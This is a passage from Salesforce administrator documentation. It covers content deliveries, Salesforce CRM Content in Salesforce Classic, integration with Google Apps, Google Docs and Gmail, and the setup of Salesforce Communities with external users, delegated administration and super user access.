If checked, the user who created the content delivery receives
an email notification the first time the content delivery URL
is clicked.

Notify Me of First View or Download

The user who owns the content delivery. (Read only)Owner Name

The record that the content delivery is associated with, such
as an account, opportunity, or custom object. Users with
sharing access to the record can click it to view more details.

Related To

If checked, the recipient must enter the provided password
before viewing the content delivery. The password appears

Require Password to Access Content

when the content delivery is generated and for the life of the
delivery on the delivery detail page.

For Salesforce CRM Content files, the title of the file included
in the content delivery. (Read only)

Title
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DescriptionField

Total number of views for the content delivery, including
internal and external. (Read only)

View Count

See Also:
Setting up Content Deliveries

Setting Up Salesforce CRM Content for Salesforce Classic
Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic data sets:

Note the following about how Salesforce CRM Content is implemented in Salesforce Classic:

• Content record information is synchronized to the device; however, the files associated with the content records are not.
This allows users to deliver content from the app even when a file is too large to be downloaded to a mobile device.

• Users can't search for a specific piece of content in the app. They can only share the content available on the Content tab,
which is automatically synchronized to their device based on the filters in their assigned mobile configuration.

• Users can't view a list of their subscribed content in the app. They also can't filter the list of records on the Content tab
based on a particular library.

• While users can preview and share content from the app, they can't update the file associated with a content record. If they
have the required permissions, they can edit the fields on the content detail page.

• Users must have a data connection to preview and deliver content. Without a data connection, they can only view the
content detail page.

• Content in Salesforce Classic is only supported on BlackBerry and iPhone devices.

• Content is not available in the free version of Salesforce Classic.

• You can't block mobile permissions for the content object. Currently, the content object in Salesforce Classic is read-only.

• You can't edit the mobile page layout for the content object. The content detail page in the app is hard-coded to display
only a few fields.

To set up Content for a Salesforce Classic configuration:

1. From Setup, click Mobile Administration > Salesforce Classic > Configurations, and then click the name of a mobile
configuration.

2. In the Data Sets related list, click Edit.
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3. Click Add....
4. In the popup window, select Content, then click OK.
5. Use field filters to specify which content records are synchronized.

Because users can't search for content in the Salesforce Classic app, it's essential to set up filters that make important
content available on the device. You can't create filters based on libraries or subscriptions, but here are a few options for
setting up useful filter conditions:

• Date: Filter on the Last Modified Date, Content Modified Date, or Created Date fields. Use special date
values like LAST 90 DAYS or LAST 180 DAYS to ensure that recently updated content records are synchronized.

• Owner: Filter on the author if certain people in your organization are responsible for publishing content.
• File Type: Filter on certain types of documents. For example, your opportunity team might generally be interested in

presentations or PDF documents.
• Custom Fields: If you created custom content fields that help you categorize your content, filter on the custom fields.

For example, if you built a Functional Use field with picklist values, you could set up a filter condition where
Functional Use equals Sales.

6. Optionally, prevent content records from consuming all the memory on a mobile device by selecting the second radio
button under Set Max Record Limit and entering the maximum number of content records this configuration can transfer
to mobile devices. Use the Order By and Sort drop-down lists to specify which records are synchronized if the data size
limit for your mobile configuration is exceeded.

7. Click Done.

See Also:
Setting Up Salesforce Classic
Setting Up Salesforce CRM Content
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GOOGLE APPS

Getting Started with Salesforce and Google Apps
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To view and modify Google Apps domain settings:

“Customize Application”To activate or deactivate Google Apps services:

“Download AppExchange packages”To install or uninstall Force.com AppExchange packages:

“Customize Application”To export a list of users to Google to create Google Apps
accounts:

Google Apps is a suite of on-demand communication and collaboration services hosted by Google and designed for business
users. If your organization has a Google Apps account, Salesforce administrators can enable Google Docs, Gmail, and a host
of Google-related AppExchange apps—customized for use within Salesforce.

Step 1: Creating a Google Apps Account
Create a Google Apps account for your organization using one of the following methods:

• From Setup, click Google Apps > Settings and click Sign Up to launch the account-creation page on the Google website.
You are prompted to register your organization's domain name or purchase a new domain name from Google. A domain
is the portion of a website's URL that follows the “www.” Follow Google's steps to configure your new or existing domain
and set up your Google Apps account.

• If your organization purchased the Salesforce and Google Apps Supported feature, from Setup, click Google Apps >
Premier Setup to create a new Google Apps Premier Edition account or upgrade your existing Standard Edition account
to Premier Edition. For details, see Getting Started With Salesforce and Google Apps Supported on page 2529.

Note: Google Apps in Salesforce supports Google Apps business accounts but not consumer accounts. You can
identify a consumer account by the “gmail.com” domain in an email address; for example, myname@gmail.com is a
consumer account. The Google Apps domain you set up in Salesforce must be the domain you registered with Google
for your organization; for example, mycompany.com is a business rather than consumer account.

Step 2: Configuring Google Apps Domain Settings
1. On the Google Apps > Settings page in Salesforce, click Edit.
2. Choose a user for the Google Apps Administrative Contact field. This person is the point of contact for Google

Apps users in your organization; specifically, if a user cannot access a Google Apps service, he or she is directed to contact
the Google Apps Administrative Contact. The Google Apps Administrative Contact does not need to be the same person
who is registered as your organization's Google Apps administrator with Google, but only the Google Apps administrator
can create new Google Apps users on your domain.
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3. Enter the Google Apps Domain that you registered with Google. For example, if your company's URL is
http://www.acme.com and you created a Google Apps account for the acme.com domain, enter acme.com in the
Google Apps Domain field.

4. Click Save.

Step 3: Activating Google Apps Services
1. In the Activate Google Apps Services section on the Google Apps > Settings page, locate the Google Apps service(s) that

you want to activate.
2. Click Edit or Install to activate a service. In the Action column, Edit corresponds to Google Apps services that are already

integrated in Salesforce, and Install corresponds to uninstalled Force.com AppExchange apps. Integrated Google Apps
services include:

• Add Google Docs to Salesforce
• Gmail to Salesforce
• Gmail Buttons and Links
• Google Talk Sidebar Component

Important: Google Talk within Salesforce is no longer available. For alternative ways to use Google Talk,
see the Google Talk online help.

For descriptions of the Google-related AppExchange apps, visit http://sites.force.com/appexchange.

Step 4: Creating Google Apps Users
Activating Google Apps services in Salesforce makes the services visible to all users in your organization, but a user cannot
access a service unless he or she has a Google Apps account on your organization's domain. The Google Apps administrator
registered with Google can create these additional accounts. For more information, see Creating Google Apps Accounts on
page 2533.

See Also:
Getting Started With Salesforce and Google Apps Supported
Setting Up Google Apps in Salesforce
Activating Google Docs in Salesforce
Using Gmail in Salesforce
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Getting Started With Salesforce and Google Apps
Supported

Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”

OR

Google Apps Administrative Contact

To create a new Google Apps Premier Edition account in
Salesforce:

“Customize Application”

OR

Google Apps Administrative Contact

To upgrade Google Apps Standard Edition to Google Apps
Premier Edition in Salesforce:

The Salesforce and Google Apps Supported feature includes a Google Apps Premier Edition account for your organization.
In Salesforce, you can create that account or upgrade from an existing Google Apps Standard Edition account to Google Apps
Premier Edition.

After you create a new Google Apps Premier Edition account or upgrade your existing Google Apps Standard Edition account
in Salesforce, the Premier Setup page displays your organization's domain name, the number of Google Apps Premier Edition
licenses available to your organization, and, if applicable, the status of your upgrade.

Creating a New Google Apps Premier Edition Account
If your organization does not have a Google Apps account, complete the following steps to register a Google Apps Premier
Edition account and enable Salesforce and Google Apps:

1. Click Settings > Google Apps > Premier Setup.
2. Complete the fields in Column A:

DescriptionField

Enter the domain that you want to register as your
organization's Google Apps account. For example, if your

Domain Name

company's URL is http://www.acme.com, enter
acme.com as your Domain Name.

This value is used to create the Google Apps administrator
for your organization's account. For example, if your Google

User Name

Apps administrator will be jsmith@acme.com, enter
jsmith. After your Google Apps account is created, you
can log in with the User Name and Password and change
this value if necessary.
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DescriptionField

This value is used to create the Google Apps administrator
for your organization's account. After your Google Apps

First Name

account is created, you can log in with the User Name and
Password and change this value if necessary.

This value is used to create the Google Apps administrator
for your organization's account. After your Google Apps

Last Name

account is created, you can log in with the User Name and
Password and change this value if necessary.

This email address receives a confirmation notice when your
Google Apps Premier Edition account is created. Google
does not store this value for any other purpose.

Email Address

The Google Apps administrator can log in to Google Apps
with this password.

Password

The Google Apps administrator can log in to Google Apps
with this password.

Confirm Password

3. Click Create New Premier Account.
4. To enable Salesforce and Google Apps, from Setup, click Google Apps > Settings.
5. Choose a user for the Google Apps Administrative Contact field. This person is the point of contact for Google

Apps users in your organization; specifically, if a user cannot access a Google Apps service, he or she is directed to contact
the Google Apps Administrative Contact. The Google Apps Administrative Contact does not need to be the same person
who is registered as your organization's Google Apps administrator with Google, but only the Google Apps administrator
can create new Google Apps users on your domain.

6. Verify that the Google Apps Domain field contains the domain name you registered with Google.
7. Activate Google Apps services in Salesforce. For more information, see Activating Google Apps Services on page 2528.
8. Create users for your organization's Google Apps account. For more information, see Creating Google Apps Accounts

on page 2533.

Note:  The number of Google Apps Premier Edition accounts you can create is limited to the number of licenses
your organization purchased with the Salesforce and Google Apps Supported feature.

Upgrading to a Google Apps Premier Edition Account
Complete the following steps to upgrade your organization's existing Google Apps Standard Edition account to a Google
Apps Premier Edition account.

1. From Setup, click Google Apps > Premier Setup.
2. Complete the fields in Column B:

DescriptionField

The domain that you want to register as your organization's
Google Apps Premier Edition account. If you already

Domain Name
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DescriptionField

enabled Salesforce and Google Apps, this field is
prepopulated with your organization's domain name.

The 16-digit token required to upgrade from Google Apps
Standard Edition to Google Apps Premier Edition. Your

Google Apps Token

organization's Google Apps administrator can access this
information on the Google website. For more information,
click Retrieve Google Apps Token in Column B.

3. Click Upgrade Existing Account to Premier.
4. To enable Salesforce and Google Apps, from Setup, click Google Apps > Settings.
5. As needed, edit the Google Apps Administrative Contact field. This person is the point of contact for Google

Apps users in your organization; specifically, if a user cannot access a Google Apps service, he or she is directed to contact
the Google Apps Administrative Contact. The Google Apps Administrative Contact does not need to be the same person
who is registered as your organization's Google Apps administrator with Google, but only the Google Apps administrator
can create new Google Apps users on your domain.

6. Verify that the Google Apps Domain field contains the domain name you registered with Google.
7. As necessary, activate Google Apps services in Salesforce. For more information, see Activating Google Apps Services on

page 2528.
8. As necessary, create users for your organization's Google Apps account. For more information, see Creating Google Apps

Accounts on page 2533.

Note:  The number of Google Apps Premier Edition accounts you can create is limited to the number of licenses
your organization purchased with the Salesforce and Google Apps Supported feature.

See Also:
Getting Started with Salesforce and Google Apps

Setting Up Google Apps in Salesforce
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To edit Google Apps domain settings and activate or
deactivate services:

“Download AppExchange packages”To install or uninstall AppExchange packages:

From Setup, click Google Apps > Settings to edit your Google Apps domain settings, activate or deactivate Google Apps
services in Salesforce, or install or uninstall Google-related Force.com AppExchange packages..
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Important:  You cannot use Salesforce and Google Apps until a Google Apps account has been created for your
organization and your Google Apps domain settings are configured in Salesforce. For instructions on creating an
account and configuring your domain settings, see Getting Started with Salesforce and Google Apps on page 2527.

Editing Google Apps Domain Settings
Domain settings consist of two values: the user chosen to administer your organization's Google Apps account and the domain
your organization registered with Google. Both fields are required to enable Google Apps in Salesforce. To edit your domain
settings:

1. In the Configure Google Apps Domain section, click Edit.
2. Optionally, choose a new user for the Google Apps Administrative Contact field. This person is the point of

contact for Google Apps users in your organization; specifically, if a user cannot access a Google Apps service, he or she
is directed to contact the Google Apps Administrative Contact. The Google Apps Administrative Contact does not need
to be the same person who is registered as your organization's Google Apps administrator with Google, but only the Google
Apps administrator can create new Google Apps users on your domain.

3. Optionally, modify the Google Apps Domain that is registered with Google for your organization's Google Apps
account. Your Google Apps Domain is typically your company's domain; for example, acme.com.

Modifying Google Apps Services
This section lists Google Apps services that are integrated with Salesforce and also provides links to several Google-related
Force.com AppExchange apps that can be easily installed from AppExchange.

To activate or deactivate an integrated service, click Edit next to the service name. These services include:

• Add Google Docs to Salesforce
• Gmail to Salesforce
• Gmail Buttons and Links
• Google Talk Sidebar Component

Important: Google Talk within Salesforce is no longer available. For alternative ways to use Google Talk, see
the Google Talk online help.

To install or uninstall an AppExchange app, click Install  or Uninstall next to the appropriate name. To view all Google-related
AppExchange offerings, visit http://sites.force.com/appexchange.

Implementation Tips
• For detailed information about Google Apps, refer to Google's online help.
• Google Apps in Salesforce is available for Google business accounts but not consumer accounts. You can identify a consumer

account by the “gmail.com” domain in an email address; for example, myname@gmail.com is a consumer account. The
Google Apps domain you set up in Salesforce must be the domain you registered with Google for your organization; for
example, mycompany.com is a business rather than consumer account.

• After creating a Google Apps account for your organization, create Google Apps accounts for your Salesforce users by
clicking Export to Google Apps under Setup, in Manage Users > Users.

• Notify users of their Google Apps usernames and passwords.
• Notify users about the changes they will see in Salesforce when Google Apps services are activated.
• To view all the Google apps available on Force.com AppExchange, visit http://sites.force.com/appexchange.
• By default, Google Apps users on your organization's domain can share Google docs with Google Apps accounts outside

your domain. The control panel for your Google Apps account contains sharing settings that enable you to restrict document
sharing to within your domain.
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• When the Add Google Docs to Salesforce service is deactivated, Google docs cannot be accessed from Salesforce records,
and any Google docs in users' Recycle Bins that were deleted from a record are permanently removed from Salesforce. If
the Add Google Docs to Salesforce service is reactivated within 30 days, Google docs that were associated with Salesforce
records before the deactivation are restored to their previous location. Deactivating the Add Google Docs to Salesforce
service does not affect Google docs in Salesforce CRM Content libraries; deactivation does not remove Google docs
associations in libraries and does not permanently delete Google docs in Recycle Bins.

• Customer Portal and partner portal users with access to the Contribute tab in Salesforce CRM Content can create new
Google docs and associate existing Google docs to a Salesforce library. Portal users without access to Salesforce CRM
Content can associate an existing Google doc to a record, but they cannot create new Google docs from within a record
because they do not have access to the Google Docs, Notes, and Attachments related list in the portal. Portal users cannot
use the Add Google Doc to Salesforce browser button.

• Customer Portal and partner portal users cannot access Gmail Buttons and Links.
• If your organization purchased the Salesforce for Google Apps Supported feature, see Getting Started With Salesforce

and Google Apps Supported on page 2529.

Best Practices
• Test your Google Apps integration using a sandbox or Developer Edition organization.
• Manage Google Apps users as you would Salesforce users. For example, if you deactivate a Salesforce user, also deactivate

his or her Google Apps account in the control panel for your organization's Google Apps account. For information about
administering your organization's Google Apps account, refer to Google's online help.

• To locate a Google doc quickly in Salesforce, search for the doc using search.

See Also:
Getting Started with Salesforce and Google Apps

Creating Google Apps Accounts
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”Export users to Google:

Google Apps administratorCreate new Google Apps accounts:

After creating a Google Apps account for your organization and enabling Google Apps in Salesforce, you can create Google
Apps accounts for individual users. To access the Google Apps services that are enabled in Salesforce, each user needs a Google
Apps account on the domain your organization registered with Google. An account includes a username and password that
allow the user to log into all Google Apps services.

Note:  If your organization purchased Salesforce and Google Apps Supported, the number of Google Apps Premier
Edition accounts you can create is limited to the number of licenses your organization purchased.

To export a list of users to Google and create Google Apps accounts for each user:
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1. From Setup, click Manage Users > Users.
2. In the View drop-down list, choose a list of users.
3. Click Export to Google Apps to export all the users in the list. To export certain users only, select those users in the Action

column.

Note:  If Google Apps is not enabled for your organization, the Export to Google Apps button does not display.
To enable Google Apps in Salesforce, see Getting Started with Salesforce and Google Apps on page 2527.

4. On the Export Users to Google Apps page, click the export file link that is labeled as Step 1. The name of the link depends
on the list view you chose to export; for example, if you were viewing the All Users list, the link on the Export Users to
Google Apps page is All Users Export File.

5. In the CSV spreadsheet that displays when click you the export link, provide a temporary password for each user. You can
modify the username, last name, and first name  fields for any user as needed. Google creates account names by
adding your domain to the usernames in the spreadsheet; for example, if your domain is acme.com and the spreadsheet
contains john.doe and jane.doe usernames, the Google Apps usernames are john.doe@acme.com and jane.doe@acme.com.

6. Save the spreadsheet to your computer.
7. Click the Google Apps Bulk User Import Tool link to launch the Bulk Account Update page for your organization's

Google Apps account. If prompted, log in with your Google Apps administrator username. Only the user who is registered
with Google as the administrator of your organization's account can create additional Google Apps accounts on your
organization's domain.

8. Follow Google's instructions to import the data in the spreadsheet. The Google Apps administrator receives a confirmation
report, and the user for each successfully created account receives a notification email at his or her new Gmail account..

9. Notify users of their usernames and passwords. They will need this information to use any Google Apps service that is
enabled in Salesforce.

See Also:
Getting Started with Salesforce and Google Apps

Activating Google Docs in Salesforce
Available in: Contact Manager, Group, Professional,Enterprise,Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”Activating the Add Google Docs to Salesforce service:

Important:  Once you activate a Google Apps service in Salesforce, it is visible to all users in your organization. To
use these services, your users must have Google Apps accounts on your domain. For more information, see Getting
Started with Salesforce and Google Apps on page 2527.

Google Docs™ allows you to create on-demand documents, spreadsheets, and presentations, edit them in your browser, and
work together in real time with other collaborators.

To activate or deactivate the Add Google Docs to Salesforce service:
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1. From Setup, click Google Apps > Settings.
2. Click Edit next to the Add Google Docs to Salesforce option in the Activate Google Apps Services list.
3. Select or deselect the Activate checkbox.
4. If you are activating the Add Google Docs to Salesforce service, read the Terms of Use and select the checkbox indicating

you agree to the Terms of Use.
5. Click Save.

When the Add Google Docs to Salesforce service is enabled, the following changes allow users to create, edit, or view Google
docs and associate them with Salesforce records:

• The Notes & Attachments related list on accounts, assets, contacts, contracts, leads, opportunities, products, and custom
objects is renamed to Google Docs, Notes, & Attachments.

• The Attachments related list on cases, solutions, and campaigns is renamed to Google Docs & Attachments.

• If Salesforce CRM Content is enabled, the Libraries tab has an Add Google Doc drop-down list.

Users can also install the Add Google Doc to Salesforce browser button, which allows them to associate a Google doc to
several Salesforce records or a Salesforce CRM Content library without being logged into Salesforce.

Implementation Tips
• For information about Google Docs, refer to Google's online help.
• By default, Google Docs users on your domain can share their Google docs with Google Apps accounts outside your

domain. The control panel in your Google Apps account contains sharing settings that enable you to restrict document
sharing to users within your organization's domain.

• Customer Portal and partner portal users with access to the Contribute tab in Salesforce CRM Content can create new
Google docs and associate existing Google docs to a Salesforce library. Portal users without access to Salesforce CRM
Content can associate an existing Google doc to a record, but they cannot create new Google docs from within a record
because they do not have access to the Google Docs, Notes, and Attachments related list in the portal. Portal users cannot
use the Add Google Doc to Salesforce browser button.

• When the Add Google Docs to Salesforce service is deactivated, Google docs cannot be accessed from Salesforce records,
and any Google docs in users' Recycle Bins that were deleted from a record are permanently removed from Salesforce. If
the Add Google Docs to Salesforce service is reactivated within 30 days, Google docs that were associated with Salesforce
records before the deactivation are restored to their previous location. Deactivating the Add Google Docs to Salesforce
service does not affect Google docs in Salesforce CRM Content libraries; deactivation does not remove Google docs
associations in libraries and does not permanently delete Google docs in Recycle Bins.

• The Add Google Docs to Salesforce service cannot be disabled for your organization if Google docs are referenced in Apex.
• Google docs count against data storage. For each Google doc associated with a record or library in Salesforce, two Kb of

storage is used.

See Also:
Getting Started with Salesforce and Google Apps
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Using Gmail in Salesforce
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”Activating Gmail in Salesforce:

Important:  Once you activate a Google Apps service in Salesforce, it is visible to all users in your organization. To
use these services, your users must have Google Apps accounts on your domain. For more information, see Getting
Started with Salesforce and Google Apps on page 2527.

Gmail™ (also called Google Mail) is a free Web-based email service from Google that operates on all standard browsers and
can be used with your company's domain. You can integrate Gmail with Salesforce in two ways:

• Gmail to Salesforce

• Gmail Buttons and Links

Gmail to Salesforce
Gmail to Salesforce allows you to automatically log emails and chats you send from your Gmail account as activities on lead,
contact, opportunity, and other records that support activity history in Salesforce.

Gmail to Salesforce is based on the Email to Salesforce feature. To activate Gmail to Salesforce for your organization, from
Setup, click Email Administration > Email to Salesforce. To configure your personal Gmail to Salesforce setup, from your
personal settings click Email > My Email to Salesforce.

Gmail Buttons and Links
Gmail Buttons and Links adds Gmail links next to email fields on all records and adds Compose Gmail buttons in Activity
History related lists on leads and contacts. When you click a Gmail link or the Compose Gmail button, Salesforce automatically
logs you into your Gmail account and automatically populates the To field. If Gmail to Salesforce is activated, Salesforce also
populates the BCC field with your Email to Salesforce address.

To activate Gmail Buttons and Links:

1. From Setup, click Google Apps > Settings.
2. In the Activate Google Apps Services list, click Edit next to Gmail Buttons and Links.
3. Select the Active checkbox to activate Gmail Buttons and Links for your organization.
4. Select the Gmail Links checkbox to add Gmail links next to all email fields (except email fields on pages under Setup).
5. Select the Gmail Buttons checkbox to add Compose Gmail buttons in Activity History related lists on leads and

contacts.
6. Read the Terms of Use, and select the checkbox indicating you have read and agree to them.
7. Click Save.

2536

Using Gmail in SalesforceGoogle Apps



Implementation Notes
• If your organization enables Gmail Buttons and Links but does not enable Gmail to Salesforce, you can still use the Gmail

links on contact and lead records; however, Salesforce does not log emails you send from your Gmail account, or automatically
populate the BCC field on the Compose Mail screen with an Email to Salesforce address.

See Also:
Getting Started with Salesforce and Google Apps
Google Online Help

Using Google Talk in Salesforce
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”Activating or deactivating Google Talk:

Important: Google Talk within Salesforce is no longer available. For alternative ways to use Google Talk, see the
Google Talk online help.

Deactivating Google Talk
To deactivate Google Talk in Salesforce:

1. From Setup, click Google Apps > Settings.
2. Click Edit next to the Google Talk Sidebar Component option in the Activate Google Apps Services list.
3. Deselect the Active checkbox.
4. Click Save.

See Also:
Getting Started with Salesforce and Google Apps
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SALESFORCE COMMUNITIES

Salesforce Communities Overview
Communities are branded spaces for your employees, customers, and partners to connect. You can customize and create
communities to meet your business needs, then transition seamlessly between them.

Available in: Unlimited, Developer, Enterprise Editions

Watch a Demo: Setting Up Your Salesforce Community (5:59 minutes)

Communities are a great way to share information and collaborate with people outside your company who are key to your
business processes, such as customers or partners.

You can use Communities to:

• Drive more sales by connecting your employees with your distributors, resellers, and suppliers

• Deliver world-class service by giving your customers one place to get answers

• Manage social listening, content, engagement, and workflow all in one place

You can create multiple communities within your organization for different purposes. For example, you could create a customer
support community to reduce support costs, or a channel sales community for partner deal support, or you could have a
community specifically dedicated to an upcoming event.

Communities may contain a subset of features and data available in your internal Salesforce organization and can be customized
to use your company branding. In addition, you can choose which members from your company and which customers, partners,
or other people outside your company can join.

Communities live inside your organization and are easily accessed from a drop-down menu in the top left corner of Salesforce.
Use this menu to switch between your communities and your internal Salesforce organization.

See Also:
Creating Communities
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Enabling Salesforce Communities
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Customize Application”To enable Communities:

Enabling Communities changes the user interface for every user in your organization. Specifically, it:

• Introduces a new global header for every user in your organization, regardless of whether or not they’re in a community.
Note that you can hide it by disabling the “View Global Header” permission on custom profiles. You can’t disable this
permission on standard profiles. However, disabling it hides the drop-down menu for switching between communities.
Ensure that your users are aware of the new header before enabling Communities.

• Enables the new user interface theme, which updates the look and feel of Salesforce.

Note:  Once you enable Communities, you can’t turn it off.

If your organization’s access to Communities is suspended for non-payment of fees due, all of your communities are
taken offline, including those in Preview status. When Communities is enabled again, all communities are in
Offline status. You can publish these communities, but can’t return them to Preview status.

1. From Setup, click Customize > Communities > Settings.
2. Select Enable Communities.
3. Select a domain name to use for your communities, then click Check Availability to make sure it’s not already being used.

We suggest that you use something recognizable to your users, such as your company name. Although the domain name
is the same for all communities, you create a unique URL for each community during the creation process. For example,
if your domain is UniversalTelco.force.com and you’re creating a customer community, you can designate the URL
as UniversalTelco.force.com/customers.

Important:  Keep in mind that you can’t change the domain name after you save it.

You can designate a completely custom domain by entering it in on the Domain Management page. From Setup, click
Domain Management > Domains.

4. Click Save.
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You can now create communities.

See Also:
Getting Started With Salesforce Communities
Salesforce Communities Overview
Domain Management Overview
Community Settings
Who Can See What in Communities

Creating Communities Users
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Manage External Users”To create external users:

“Manage Users”

AND

Read on Accounts

To log in as an external user:

To allow an external user to access your community, you must enable the external user’s contact record as a customer user or
partner user, depending on their license type. Your community can contain users with both Partner Community and Customer
Community licenses.

1. To create partner users:

a. View the external account you want to create a user for.
b. Create a new contact. Click New Contact from the Contacts related list. Fill in the appropriate details, then click Save.

Note:  Partner contacts can’t be owned by a non-partner account.

c. On the contact detail page, click Manage External User, then Enable Partner User.
d. Edit the user record for this external user.

• Select the Partner Community user license.
• Select the appropriate profile. Remember that profiles give users access to tabs in your community, so be sure you

choose a profile that has the appropriate tabs exposed.

Note:  The available profiles for external users are limited to the Partner Community User profile or profiles
cloned from it. Unlike a standard user, the partner user role is automatically assigned based on the account
name. The partner user role is a subordinate of the account owner's role, therefore, all data for the partner
user role rolls up to the partner account owner's role. Keep in mind that if you disable a partner user, their
partner user role becomes obsolete and their data no longer rolls up to the partner account role.
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• Deselect Generate new password and notify user immediately so that users don’t receive a password before the
community is published. When you publish the community, the user will receive a welcome email with their login
information, as long as the Send welcome email option is selected for the community.

Note:

If you select this option, but your organization doesn’t have any Published communities that the user is
a member of, Salesforce doesn’t send an email with login information.

e. Click Save.

2. To create customer users:

a. Create a new contact.
b. On the contact detail page, click Manage External User, then Enable Customer User.
c. Edit the user record for this external user.

• Select the appropriate profile. The available profiles are limited to the Customer Community User profile and any
profiles cloned from it.

Remember that profiles give users access to tabs in your community, so be sure you choose a profile that has the
appropriate tabs exposed.

• Deselect Generate new password and notify user immediately so that users don’t receive a password before the
community is published. When you publish the community, the user will receive a welcome email with their login
information, as long as the Send welcome email option is selected for the community.

Note:

If you select this option, but your organization doesn’t have any Published communities that the user is
a member of, Salesforce doesn’t send an email with login information.

d. Click Save.

To troubleshoot issues or ensure the community is configured appropriately, on the contact detail page, click Manage External
User and choose Log in As Partner User or Log in as Customer User. A new browser window opens and you are logged into
the community on behalf of the external user.

Consider the following when creating external users.

• External users can’t be deleted. If you no longer want an external user to have access to a community, deactivate the user.

See Also:
Delegating External User Administration
Adding Members to Your Community
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Delegating External User Administration
You can delegate user administration to external users so that they can decide who should access the community.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Manage External Users”To manage external users:

“Manage Users”To create, edit, and delete profiles:

External users who are delegated administrators can:

• Create external users
• Edit external users
• Reset passwords for external users
• Deactivate existing external users

You can grant delegated external user administration rights to users with Partner Community, Gold Partner, Enterprise
Administration, and Customer Portal Manager licenses.

1. From Setup, click Manage Users > Profiles and click a custom profile.

You can’t edit standard profiles.

You can add Delegated External User Administrator to a permission set that you assign to a standard profile.

2. Click Edit.
3. Select Delegated External User Administrator.
4. Click Save.
5. Click Edit in the Delegated External User Profiles related list.
6. Select the profiles you want users with this profile to be able to administer.
7. Click Save.

Consider the following when setting up delegated external user administration.

• You can also grant delegated administration rights using permission sets.
• On the profile you’re granting delegated administration rights to:

◊ Add the “Create” and “Edit” permissions on contacts so that delegated administrators can create and update contacts
related to their account.

◊ Set the Accounts and Contacts tab settings to Default On so that delegated administrators can view the Accounts and
Contacts tabs and easily manage contacts related to their accounts.

• Add the Accounts and Contacts tabs to your community.
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• Set field level security and page layouts so that delegated external user administrators can access only the account and
contact fields you specify.

See Also:
Creating Communities Users
Granting Super User Access to Users in Your Community

Granting Super User Access to Users in Your Community
Partner Super User Access must be enabled in your Communities Settings before you can grant access to users. You can only
grant super user access to users with Partner Community licenses.

Granting super user access to external users in your community lets them access additional data and records, regardless of
sharing rules and organization-wide defaults. Super users have access to data owned by other partner users belonging to the
same account who have the same role or a role below them in the role hierarchy. Super user access applies to cases, leads,
custom objects, and opportunities only, but external users have access to these objects only if you exposed them using profiles
or sharing and added the tabs to the community during setup.

1. View the contact record for the user.
2. Click Manage External Account, then choose Enable Super User Access.
3. Click OK.

See Also:
Delegating External User Administration

Community Settings
Update general settings to control access and sharing for external users in your communities.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Customize Application”To edit Communities settings:

• Set the default number of roles created when a partner account is enabled

• Enable super user access for external users

• Use Sharing Tools to ensure that external users have appropriate access

See Also:
Creating Communities Users
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Setting the Default Number of Community Roles
Set the default number of roles created when adding partner accounts to communities.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Customize Application”To set the number of default roles:

If your community is set up with Partner Community user licenses, this setting applies. By setting the number of partner roles,
you can limit the number of unused roles, which can improve performance. The limit is three roles; the system default is one.

For example, if three partner roles are currently created when an account is enabled for your community–Executive, Manager,
and User–but you need only the User role for new accounts, you can reduce the number to one role.

To set the number of roles:

1. Click Customize > Communities > Settings.
2. Set the Number of partner roles per partner account.
3. Click Save.

The number of roles for existing partner accounts isn’t affected by this setting.

See Also:
Community Settings
Creating Communities Users

Enabling Super User Access in Communities
Enable super user access so that partner users in communities can access additional records and data.

Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Customize Application”To enable Super User Access:

If your community is set up with Partner Community user licenses, this setting applies.

Granting super user access to external users in your community lets them access additional data and records, regardless of
sharing rules and organization-wide defaults. Super users have access to data owned by other partner users belonging to the
same account who have the same role or a role below them in the role hierarchy. Super user access applies to cases, leads,
custom objects, and opportunities only, but external users have access to these objects only if you exposed them using profiles
or sharing and added the tabs to the community during setup.
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1. Click Customize > Communities > Settings.
2. Select Enable Partner Super User Access.
3. Click Save.

You can now assign super user access.

To disable super user access, deselect Enable Partner Super User Access. If you re-enable this feature, all users who
were assigned super user access before the feature was disabled will automatically get super user access again.

See Also:
Community Settings
Creating Communities Users

Creating Communities
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

1. To start creating communities, click Customize > Communities > Manage Communities, then click New Community.
2. Enter a community name.

Note:  If you’re creating multiple communities, keep in mind that community names may be truncated in the
global header drop-down menu. Users can see up to 32 characters of the name, and the Preview and Offline
status indicators count toward that number. Make sure that the visible part of the name is distinctive enough for
users to distinguish between multiple communities.

3. Enter a description.
4. Enter a unique value at the end of the URL field.

This value is appended to the domain you entered when enabling communities to create a unique URL for this community.
For example, if your domain is UniversalTelco.force.com and you’re creating a customer community, you can
designate the URL as UniversalTelco.force.com/customers.

Note:  You can create one community in your organization that doesn’t have a custom URL.

You can change your community name and URL after the community is published, but users won’t be redirected
to the new URL. If these changes are necessary, be sure to inform your community members before making the
change.

5. Click Create.
The community is created in Preview status.

6. On the confirmation page, click Edit to customize your community.
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Important:  When you create a community, your profile is automatically added to the list of profiles that have access.
As a result, all users in your organization with this profile can log in to the community once it’s Published. If you
don’t want all users with your profile to have access, you can remove the profile and give yourself access through a
different profile or permission set.

See Also:
Salesforce Communities Overview

COMMUNITY CUSTOMIZATION

Customizing Communities
Available in: Unlimited, Developer, Enterprise Editions

User Permissions Needed

“Create and Manage Communities”To create, customize, or publish a community:

You can customize your community at any time, but if you plan on making major changes, we recommend taking the community
offline first.

1. Click Customize > Communities > Manage Communities, then click Edit next to the community name.
2. Select the part of the community you want to customize:

• Members
• Tabs
• Branding
• Login Page
• Emails

3. To perform advanced customizations, such as adding custom pages or pages that don’t require login, click either Force.com
